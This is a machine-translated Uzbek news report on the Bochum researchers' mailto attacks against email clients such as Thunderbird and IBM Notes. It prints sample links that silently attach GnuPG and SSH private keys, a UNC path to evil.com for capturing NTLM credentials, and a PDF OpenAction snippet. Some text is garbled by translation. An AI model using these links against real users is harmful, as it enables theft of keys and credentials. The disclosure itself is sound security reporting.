Bochum Ruhr universiteti tadqiqotchilari (Germaniya)
Havolalar «
Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) va Pegasus Mail pochta mijozlari sizga avtomatik ravishda biriktirish imkonini beruvchi ahamiyatsiz hujumga qarshi himoyasiz edi. “mailto:?attach=path_to_file” kabi havola orqali belgilangan har qanday mahalliy fayl. Fayl ogohlantirishsiz biriktirilgan, shuning uchun alohida e'tiborsiz foydalanuvchi xatning ilova bilan yuborilishini sezmasligi mumkin.
Masalan, “mailto” kabi havoladan foydalanish:[elektron pochta bilan himoyalangan]&subject=Title&body=Matn&attach=~/.gnupg/secring.gpg" siz GnuPG-dan shaxsiy kalitlarni xatga kiritishingiz mumkin. Shuningdek, siz kripto hamyonlar (~/.bitcoin/wallet.dat), SSH kalitlari (~/.ssh/id_rsa) va foydalanuvchi uchun ochiq bo'lgan har qanday fayllar tarkibini yuborishingiz mumkin. Bundan tashqari, Thunderbird “attach=/tmp/*.txt” kabi konstruksiyalardan foydalanib, fayllar guruhlarini niqob yordamida biriktirishga imkon beradi.
Mahalliy fayllarga qo'shimcha ravishda, ba'zi elektron pochta mijozlari IMAP serveridagi tarmoq xotirasi va yo'llariga havolalarni qayta ishlaydi. Xususan, IBM Notes “attach=\\evil.com\dummyfile” kabi havolalarni qayta ishlashda faylni tarmoq katalogidan oʻtkazish, shuningdek, tajovuzkor tomonidan boshqariladigan SMB serveriga havola yuborish orqali NTLM autentifikatsiya parametrlarini ushlab turish imkonini beradi. (so'rov joriy autentifikatsiya parametrlari foydalanuvchisi bilan yuboriladi).
Thunderbird IMAP serveridagi papkalardan kontent biriktirish imkonini beruvchi “attach=imap:///fetch>UID>/INBOX>1/” kabi soʻrovlarni muvaffaqiyatli qayta ishlaydi. Shu bilan birga, OpenPGP va S/MIME orqali shifrlangan IMAP’dan olingan xabarlar jo‘natishdan oldin pochta mijozi tomonidan avtomatik ravishda shifrlanadi. Thunderbird-ni ishlab chiquvchilar edi
Thunderbird-ning eski versiyalari tadqiqotchilar tomonidan taklif qilingan PGP va S/MIME-dagi boshqa ikkita hujum variantiga ham zaif edi. Xususan, Thunderbird, shuningdek, OutLook, PostBox, eM Client, MailMate va R2Mail2 kalitlarni almashtirish hujumiga uchradi, bu esa pochta mijozi S/MIME xabarlarida uzatiladigan yangi sertifikatlarni avtomatik ravishda import qilishi va o'rnatishi tufayli yuzaga kelgan. tajovuzkor foydalanuvchi tomonidan allaqachon saqlangan ochiq kalitlarni almashtirishni tashkil qiladi.
Thunderbird, PostBox va MailMate sezgir bo'lgan ikkinchi hujum, qoralama xabarlarni avtomatik saqlash mexanizmining xususiyatlarini manipulyatsiya qiladi va mailto parametrlaridan foydalanib, shifrlangan xabarlarning shifrini ochish yoki o'zboshimchalik bilan xabarlar uchun raqamli imzo qo'shishni boshlash imkonini beradi. natijani tajovuzkorning IMAP serveriga keyinchalik uzatish. Ushbu hujumda shifrlangan matn "tana" parametri orqali uzatiladi va "meta refresh" tegi tajovuzkorning IMAP serveriga qo'ng'iroqni boshlash uchun ishlatiladi. Masalan: ' '
“Mailto:” havolalarini foydalanuvchi ishtirokisiz avtomatik tarzda qayta ishlash uchun maxsus ishlab chiqilgan PDF hujjatlaridan foydalanish mumkin - PDF-dagi OpenAction amali hujjatni ochishda mailto ishlov beruvchisini avtomatik ravishda ishga tushirish imkonini beradi:
%PDF-1.5
1 0 obj
<< /Tur /Katalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Tur /Action /S /URI/URI (mailto:?body=—— PGP MESSAGENI BOSHLASH——[…])>>
endobj
Manba: opennet.ru